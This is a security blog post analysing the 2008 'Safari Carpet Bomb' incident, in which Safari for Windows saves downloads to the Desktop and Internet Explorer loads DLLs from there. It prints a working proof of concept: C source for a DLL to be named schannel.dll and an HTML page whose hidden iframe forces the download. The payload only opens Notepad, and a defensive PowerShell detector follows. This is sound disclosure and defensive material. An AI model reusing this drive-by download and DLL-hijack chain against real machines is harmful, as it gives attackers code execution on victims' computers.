Summary of What Happened

Nitesh Dhanjani discovered that Safari for Windows automatically saves downloads to the Desktop and argued that this can potentially make a mess of the Desktop, naming the effect the "Safari Carpet Bomb". Later Microsoft issued an advisory stating "remote code execution on all supported versions of Windows XP and Windows Vista" and crediting "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". Aviv Raff posted on his blog "Safari pwns Internet Explorer", clarifying that "this combined attack also exploits an old vulnerability in Internet Explorer that I've already reported to them a long long time ago".
Technical Details of This Incident

The old vulnerability that Aviv Raff reported to Microsoft a long time ago is described in two articles by Aviv Raff:
IE7 DLL-load hijacking Code Execution Exploit PoC, and
Internet Explorer 7 - Still Spyware Writers Heaven, both dating back to 2006 (yeah, that's really "a long long time ago"). The vulnerability is that Windows Internet Explorer loads program library files (DLLs) from the user's Desktop instead of from its own library folder (usually C:\WINDOWS\SYSTEM32) when the filenames take certain specific values.
Safari for Windows downloads files to the Desktop by default with no confirmation, which is a quite reasonable and convenient feature. Windows Internet Explorer loads a program library (DLL) from the Desktop if the filename matches one of those specific values. Put the two together, or "blended", and IE loads a library file that Safari downloaded. Loading a library runs the code in the library file, so loading the wrong file means executing the wrong code.
Proof of Concept Code

----------dll.c----------
#include <windows.h>

/* Entry point called by the loader when Internet Explorer picks up this DLL
 * from the Desktop. The payload is deliberately harmless: it launches NOTEPAD
 * with a marker string as the file name, so the load is visible to the tester. */
BOOL APIENTRY DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    /* CreateProcess may write to its command-line argument, so use a writable
       buffer rather than a string literal. */
    char cmd[] = "NOTEPAD \"=====(((((we are in)))))=====\"";

    /* Run the payload once, when the DLL is mapped into the process,
       not again on every DLL_THREAD_ATTACH notification. */
    if (fdwReason != DLL_PROCESS_ATTACH)
        return TRUE;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    return TRUE;
}
Compile with cl /LD dll.c and rename the generated DLL to "schannel.dll".
----------index.html----------
<html><head>
<title>Safari for Windows Proof of Concept (Incident in June 2008)</title>
</head><body>
Safari for Windows Proof of Concept (Incident in June 2008)<br>
<br>
<a href="http://liudieyu0.blog124.fc2.com/blog-entry-1.html">Detailed Analysis Available on My Blog ...</a><br>
<br>
Step 1. Browse this web page with Safari for Windows, and the download is saved to the Desktop.
It's a legitimate feature.<br>
<iframe src="schannel.dll" width=1 height=1></iframe><br>
Step 2. Now launch Internet Explorer from the Desktop or the Start Menu, and the code in the DLL file is executed.
<i>This is the issue.</i><br>
<br>
Note:<br>
The code in the DLL file launches NOTEPAD to open a file that doesn't exist.<br>
Please remove the downloaded DLL file from the Desktop after testing.<br>
</body></html>
Live Demo

http://liudieyu.com/iesafari200806.2885391780966027/

Final Words on This

A design flaw in Windows Internet Explorer, versions 8 beta and 7, and probably others, breaks the security of Apple's Safari for Windows. The problem originates in an error whereby Windows Internet Explorer loads some program library files (DLLs) from the user's Desktop instead of from its own library folder (usually C:\WINDOWS\SYSTEM32). Apple's Safari for Windows downloads and saves requested files to the user's Desktop by default; this default behavior does not itself constitute a mistake. Microsoft used some vague wording in the advisory: the "Suggested Actions" are "Restrict use of Safari as a web browser ...", as if the flaw were rooted in Safari.
In a sub-section of "Suggested Actions", Microsoft admits under "Workarounds" to "Change the download location of content in Safari to a newly created directory". The full statement should be "Change the download location of content in Safari to a newly created directory (to preserve the integrity of Windows Internet Explorer)".
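As an added example, not part of the original post, the following PowerShell check looks for the condition that workaround is meant to prevent: a DLL sitting in the default download folder whose name shadows a DLL in the Windows system directory, exactly what the planted "schannel.dll" above creates. The Desktop and system directory paths are taken from the environment; the name-collision rule is a heuristic for review, not a statement of which DLLs Internet Explorer actually loads.

```powershell
# Added example, not code from the original post: report DLL files in a
# download folder whose names shadow DLLs in the Windows system directory.
# Paths come from the environment; pass -DownloadDir to check another folder.
param(
    [string]$DownloadDir = [Environment]::GetFolderPath('Desktop'),
    [string]$SystemDir   = [Environment]::SystemDirectory
)

# Build a case-insensitive lookup of every DLL name present in the system directory.
$systemDlls = @{}
Get-ChildItem -Path $SystemDir -Filter '*.dll' -File -ErrorAction SilentlyContinue |
    ForEach-Object { $systemDlls[$_.Name.ToLowerInvariant()] = $true }

# Any DLL in the download folder with a colliding name is reported together with
# its hash and Authenticode status, so an unsigned or unknown copy stands out.
$findings = Get-ChildItem -Path $DownloadDir -Filter '*.dll' -File -ErrorAction SilentlyContinue |
    Where-Object { $systemDlls.ContainsKey($_.Name.ToLowerInvariant()) } |
    ForEach-Object {
        [PSCustomObject]@{
            Name      = $_.Name
            Path      = $_.FullName
            LastWrite = $_.LastWriteTime
            Signature = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
            SHA256    = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
        }
    }

if ($findings) {
    Write-Warning "DLL files in '$DownloadDir' shadow system DLL names:"
    $findings | Format-Table -AutoSize
} else {
    Write-Host "No DLLs in '$DownloadDir' collide with names in '$SystemDir'."
}
```

A reported file that is unsigned, or signed by someone other than Microsoft, is the case worth removing or investigating; a legitimate copy of a system DLL has no business in a download folder either.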
PS:
I'm not an Apple fan; in fact I applied for their Safari for Windows Tester position and they never replied. It's not so lame, because they don't even get back to reporters when the whole world is accusing their product -
"An Apple spokesman did not return a phone call and e-mail seeking comment".
I believe in time all things come to light.